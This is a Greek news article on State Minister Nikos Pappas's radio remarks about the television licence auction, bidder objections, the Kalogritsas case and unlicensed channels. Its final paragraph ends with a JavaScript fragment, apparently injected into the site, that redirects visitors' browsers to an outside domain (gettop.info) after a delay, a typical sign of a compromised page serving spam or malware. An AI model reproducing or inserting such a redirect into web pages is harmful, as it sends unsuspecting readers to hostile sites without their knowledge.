Παππάς: Δεν μπορούμε να εγγυηθούμε σε κανέναν υπερθεματιστή ότι θα πάρει την άδεια

0
8

 

Απαντήσεις σε όλα τα ερωτήματα που προέκυψαν από τις τηλεοπτικές άδειες έδωσε ο υπουργός Επικρατείας Νίκος Παππάς, μιλώντας στο ραδιόφωνο του ΠΑΡΑΠΟΛΙΤΙΚΑ 90,1 ξεκαθαρίζοντας πως η διαδικασία βρίσκεται στην φάση της εξέτασης των ενστάσεων που έχουν κατατεθεί και κάποιους από τους συμμετέχοντες στο διαγωνισμό υποστηρίζοντας ότι ««Δεν είμαστε σε θέση να εγγυηθούμε σε κανέναν από τους τέσσερις ότι θα πάρει την άδεια, συντρέχουν και άλλες προϋποθέσεις» και συμπλήρωσε: «Είναι ανοιχτό το ενδεχόμενο αν υπάρξει κάποιο πρόβλημα σε κάποιον από τους υπερθεματιστές να μην περάσει στην επόμενη φάση. Θα φύγει το επόμενο δευτερόλεπτο».

Χαρακτηριστικά ανέφερε ο κ. Παππάς: «Αυτός ο διαγωνισμός είχε αλλεπάλληλα φίλτρα τα οποία οι πολιτικοί μας αντίπαλοι που εξαπολύουν εμετούς υπερασπιζόμενοι συμφέροντα δικά τους δεν ομολογούν. Τώρα είμαστε στο στάδιο να εξετάσουμε τις ενστάσεις. Υπάρχει ενδεχόμενο να μην περάσουν στην επόμενη φάση κάποιοι από τους υπερθεματιστές. Αν δεν είναι εντάξει κάποιος φεύγει το επόμενο δευτερόλεπτο. Εμείς δεν είμαστε σκιτζήδες. Στην Ελλάδα έχει συντελέστει αυτά τα χρόνια μια αεροπειρατεία. Πήραν με σκοτεινό τρόπο τον αέρα της χώρας».

Σε ερώτηση αν ένας υπερθεματιστής και μέτοχος μπορεί να δανειστεί από ναυτιλιακή και να το εμφανίσει στο πόθεν έσχες απάντησε ότι… καλείται να αποδείξει αν έχει τα οικονομικά μέσα για να ανταποκριθεί στο τίμημα ..

Είπε ωστόσο ότι εγείρονται ερωτήματα για το εάν κάποιος έχει τη δυνατότητα να ανταποκριθεί οικονομικά όταν έχουν μπλοκαριστεί οι λογαριασμοί του.

«Απευθυνόμενος σε εχθρούς και φίλους» είπε ότι «Κάνουν λάθος εάν νομίζουν ότι η Γενική Γραμματεία ενημέρωσης και ο υπουργός Επικρατείας ασκούν πολιτική Παππά. Η πολιτική είναι κυβερνητική».

Την ίδια στιγμή ο κ. Παππάς αναφερόμενος στο θέμα του STAR ανέφερε: «Ο Βαρδινογιάννης θα πρέπει να εξηγήσει στους εργαζομένους του γιατί έδωσε ένα τέτοιο χαμηλό τίμημα».

Στο θέμα Καλογρίτσα ο κ. Παππάς επιχείρησε να πάρει αποστάσεις από το ζήτημα σημειώνοντας ότι η υπόθεση είναι υπό διερεύνηση, προσθέτοντας ότι «θα εξεταστούν όλες οι ενστάσεις που έχουν κατατεθεί».

Σε όσους αναφέρουν ότι η υπόθεση Καλογρίτσα, είναι το Βατοπαίδι του ΣΥΡΙΖΑ, ο κ. Παππάς απάντησε «τους εύχομαι καλή τύχη» και συνέχισε «Κάποιοι προσπαθούν να εμπλέξουν στην υπόθεση αυτή και τον Πρόεδρο της Δημοκρατίας ζητώντας την παρέμβασή του. Αυτό δείχνει ότι το προηγούμενο τηλεοπτικό καθεστώς της ασυδοσίας παίζει το τελευταίο του χαρτί. Έχουμε δεχτεί τα πάντα ξεδιάντροπα, μέχρι και τις οικογένειές μας, τους στενούς μας συγγενείς. Τα πάντα. Τους καλώ να συνεχίσουν γιατί και εμείς θα συνεχίσουμε».

Τέλος ο κ. Παππάς αναφερόμενος στους ανθρώπους που αποτελούσαν την επιτροπή σημείωσε με έμφαση: «Ευχαριστώ τους ανθρώπους της επιτροπής και είναι θρασύδειλοι αυτοί που τους στοχοποιούν. Δεν θα εκβιάζουν δημόσιους λειτουργούς επειδή έχουν οικονομική επιφάνεια».

Σχετικά με το τι θα γίνει με τα κανάλια που δεν έχουν άδεια ο υπουργός Επικρατείας τόνισε: «Ουδείς είναι υπεράνω του Νόμου. Η Digea θα μπορεί να μεταφέρει το σήμα των νομίμως αδειοδοτουμένων» και σημείωσε: «Μιλάμε για ακραία πράγματα που έγιναν τα τελευταία χρόνια. Σας είπα μιλάμε για αεροπειρατεία. Κι έρχονται οι άνθρωποι αυτοί να μας κουνήσουν το δάχτυλο επειδή βάλαμε σε τάξη τα τηλεοπτικά πράγματα».

Σε ό,τι αφορά το περούκα-gate στις ΗΠΑ, ο κ. Παππάς είπε ότι οι δύο δημοσιογράφοι λειτούργησαν κατόπιν οδηγιών των καναλιών στα οποία εργάζονται αφήνοντας αιχμές κατά των κκ. Κοντομηνά και Βαρδινογιάννη: «Δεν είμαι πολύ σίγουρος αν φταίνε οι δημοσιογράφοι ή οι ιδιοκτήτες των μέσων. Υπόθεση εργασίας, η πιο σοβαρή και πιθανολογούμενη είναι ότι λειτούργησαν κατόπιν οδηγιών». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here